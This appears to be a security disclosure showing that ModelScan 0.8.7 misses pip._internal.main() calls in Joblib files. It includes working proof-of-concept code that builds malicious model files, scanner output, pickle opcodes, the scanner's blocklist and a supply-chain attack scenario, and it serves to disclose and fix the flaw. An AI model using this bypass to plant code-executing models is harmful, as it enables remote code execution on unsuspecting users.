| | --- |
| | license: mit |
| | --- |
| | # HUNTR MFV SUBMISSION - ModelScan Joblib pip._internal Bypass |
| | |
| | ## Target Format |
| | **Joblib** |
| | |
| | ## Title |
| | **ModelScan Scanner Bypass via pip._internal.main() in Joblib Files - Missing Blocklist Entry** |
| | |
| | ## HuggingFace PoC |
| | **https://huggingface.co/kfoughali/mfv-modelscan-joblib1** |
| | |
| | Files: |
| | - `scanner_bypass_poc.joblib` (64 bytes) - Safe demo: displays `pip install --help` |
| | - `scanner_bypass_rce.joblib` (103 bytes) - RCE proof: downloads a file to `/tmp/joblib_rce_proof/` |
| | |
| | --- |
| | |
| | ## Vulnerability Summary |
| | |
| | **Tested on:** ModelScan v0.8.7 |
| | |
| | ModelScan does not include `pip` or `pip._internal` in its CRITICAL blocklist for unsafe Pickle operations. Since Joblib uses Pickle internally for serialization, this gap directly affects `.joblib` files. |
| |
|
| | A malicious Joblib file can: |
| | - Pass ModelScan security checks, returning "No issues found" |
| | - Execute arbitrary code during deserialization via `pip._internal.main(...)` |
| | - Enable supply-chain attacks, since malicious sklearn models appear harmless |
| |
|
| | This is the same vulnerability class as **CVE-2025-1716** (picklescan `pip.main()` bypass), but affects ModelScan. |
| |
|
| | --- |
| |
|
| | ## Proof of Bypass |
| |
|
| | ### ModelScan Output (Both Files) |
| |
|
| | ``` |
| | $ modelscan --version |
| | modelscan, version 0.8.7 |
| | |
| | $ modelscan --path scanner_bypass_poc.joblib |
| | Scanning scanner_bypass_poc.joblib using modelscan.scanners.PickleUnsafeOpScan |
| | --- Summary --- |
| | No issues were found! |
| | |
| | $ modelscan --path scanner_bypass_rce.joblib |
| | Scanning scanner_bypass_rce.joblib using modelscan.scanners.PickleUnsafeOpScan |
| | --- Summary --- |
| | No issues were found! |
| | ``` |
| |
|
| | --- |
| |
|
| | ## Payloads |
| |
|
| | ### PoC Payload (`scanner_bypass_poc.joblib`) |
| |
|
| | **Purpose:** Safe demonstration - displays pip install help text |
| |
|
| | ```python |
| | import joblib |
| | |
| | class PipBypassPoC: |
| | def __reduce__(self): |
| | from pip._internal import main |
| | return main, (['install', '--help'],) |
| | |
| | joblib.dump(PipBypassPoC(), 'scanner_bypass_poc.joblib') |
| | ``` |
| |
|
| | **Execution:** |
| | ``` |
| | $ python3 -c "import joblib; joblib.load('scanner_bypass_poc.joblib')" |
| | |
| | Usage: |
| | pip install [options] <requirement specifier> [package-index-options] ... |
| | pip install [options] -r <requirements file> [package-index-options] ... |
| | ... |
| | ``` |
| |
|
| | --- |
| |
|
| | ### RCE Payload (`scanner_bypass_rce.joblib`) |
| |
|
| | **Purpose:** Proves arbitrary code execution by downloading a file |
| |
|
| | ```python |
| | import joblib |
| | |
| | class PipBypassRCE: |
| | def __reduce__(self): |
| | from pip._internal import main |
| | return main, (['download', '--no-deps', '-d', '/tmp/joblib_rce_proof', 'pip'],) |
| | |
| | joblib.dump(PipBypassRCE(), 'scanner_bypass_rce.joblib') |
| | ``` |
| |
|
| | **Execution:** |
| | ``` |
| | $ rm -rf /tmp/joblib_rce_proof |
| | $ python3 -c "import joblib; joblib.load('scanner_bypass_rce.joblib')" |
| | |
| | Collecting pip |
| | Downloading pip-25.3-py3-none-any.whl (1.8 MB) |
| | Saved /tmp/joblib_rce_proof/pip-25.3-py3-none-any.whl |
| | Successfully downloaded pip |
| | |
| | $ ls /tmp/joblib_rce_proof/ |
| | pip-25.3-py3-none-any.whl |
| | ``` |
| |
|
| | **Code executes despite "No issues found" scan result.** |
| |
|
| | --- |
| |
|
| | ## Pickle Opcodes (RCE Variant) |
| |
|
| | ``` |
| | 0: \x80 PROTO 4 |
| | 11: \x8c SHORT_BINUNICODE 'pip._internal' <- Module NOT in blocklist |
| | 27: \x8c SHORT_BINUNICODE 'main' <- Function to call |
| | 34: \x93 STACK_GLOBAL <- pip._internal.main |
| | 39: \x8c SHORT_BINUNICODE 'download' |
| | 50: \x8c SHORT_BINUNICODE '--no-deps' |
| | 62: \x8c SHORT_BINUNICODE '-d' |
| | 67: \x8c SHORT_BINUNICODE '/tmp/joblib_rce_proof' |
| | 91: \x8c SHORT_BINUNICODE 'pip' |
| | 100: R REDUCE <- Execute pip._internal.main([...]) |
| | ``` |
| |
|
| | --- |
| |
|
| | ## ModelScan Blocklist Analysis |
| |
|
| | Current blocklist in `modelscan/settings.py` - **pip is MISSING**: |
| |
|
| | ```python |
| | "CRITICAL": { |
| | "__builtin__": ["eval", "compile", "getattr", "apply", "exec", "open", "breakpoint", "__import__"], |
| | "builtins": ["eval", "compile", "getattr", "apply", "exec", "open", "breakpoint", "__import__"], |
| | "runpy": "*", |
| | "os": "*", |
| | "nt": "*", |
| | "posix": "*", |
| | "socket": "*", |
| | "subprocess": "*", |
| | "sys": "*", |
| | "operator": ["attrgetter"], |
| | "pty": "*", |
| | "pickle": "*", |
| | "_pickle": "*", |
| | "bdb": "*", |
| | "pdb": "*", |
| | "shutil": "*", |
| | "asyncio": "*", |
| | # "pip" is NOT here! |
| | # "pip._internal" is NOT here! |
| | }, |
| | ``` |
| |
|
| | --- |
| |
|
| | ## Attack Scenario |
| |
|
| | 1. Attacker creates malicious PyPI package with RCE in build hooks: |
| | ```python |
| | # pyproject.toml or setup.py hooks can execute arbitrary code |
| | # Example: exfiltrate credentials, establish reverse shell, etc. |
| | ``` |
| |
|
| | 2. Attacker creates Joblib file calling `pip._internal.main(['install', 'malicious-pkg'])` |
| |
|
| | 3. Joblib file passes ModelScan: **"No issues found! 🎉"** |
| |
|
| | 4. Victim loads sklearn model: `joblib.load('model.joblib')` |
| |
|
| | 5. **RCE achieved** via pip install hooks |
| |
|
| | --- |
| |
|
| | ## Impact |
| |
|
| | | Impact | Description | |
| | |--------|-------------| |
| | | **Scanner Bypass** | ModelScan 0.8.7 reports "No issues found" | |
| | | **Code Execution** | Arbitrary code via pip install/download hooks | |
| | | **Supply Chain** | Malicious sklearn models appear safe | |
| | | **Wide Scope** | Affects all Joblib/sklearn model pipelines using ModelScan | |
| |
|
| | --- |
| |
|
| | ## Recommended Fix (Scanner-Side) |
| |
|
| | Add `pip` and `pip._internal` to the CRITICAL blocklist in `modelscan/settings.py`: |
| |
|
| | ```python |
| | "CRITICAL": { |
| | "__builtin__": ["eval", "compile", "getattr", "apply", "exec", "open", "breakpoint", "__import__"], |
| | "builtins": ["eval", "compile", "getattr", "apply", "exec", "open", "breakpoint", "__import__"], |
| | "runpy": "*", |
| | "os": "*", |
| | "nt": "*", |
| | "posix": "*", |
| | "socket": "*", |
| | "subprocess": "*", |
| | "sys": "*", |
| | "operator": ["attrgetter"], |
| | "pty": "*", |
| | "pickle": "*", |
| | "_pickle": "*", |
| | "bdb": "*", |
| | "pdb": "*", |
| | "shutil": "*", |
| | "asyncio": "*", |
| | "pip": "*", # <-- ADD |
| | "pip._internal": "*", # <-- ADD |
| | }, |
| | ``` |
| |
|
| | **Why this is the correct fix:** |
| | 1. Aligns with the fix applied in picklescan for CVE-2025-1716 |
| | 2. Treats `pip._internal.main()` as a dangerous callable |
| | 3. Blocks both `pip.main` and `pip._internal.main` variants |
| |
|
| | --- |
| |
|
| | ## Why This Is Distinct from a Pickle Submission |
| |
|
| | | Aspect | Pickle (.pkl) | Joblib (.joblib) | |
| | |--------|---------------|------------------| |
| | | Scanner code path | `PickleUnsafeOpScan` on `.pkl` | `PickleUnsafeOpScan` on `.joblib` | |
| | | Format detection | `SupportedModelFormats.PICKLE` | `SupportedModelFormats.JOBLIB` | |
| | | Primary use case | Generic Python objects | **sklearn models** (ML industry standard) | |
| | | Supply chain impact | General serialization | **ML model pipelines** specifically | |
| |
|
| | ModelScan explicitly supports Joblib as a distinct format. The `pip._internal` gap affects this scanner path. |
| |
|
| | --- |
| |
|
| | ## References |
| |
|
| | - CVE-2025-1716: https://nvd.nist.gov/vuln/detail/CVE-2025-1716 |
| | - GHSA-655q-fx9r-782v: https://github.com/advisories/GHSA-655q-fx9r-782v |
| | - ModelScan: https://github.com/protectai/modelscan |
| |
|
| | --- |
| |
|
| | **Researcher:** Karim Foughali |
| | **Email:** kfoughali@dzlaws.org |
| | **Date:** January 17th 2026 ** |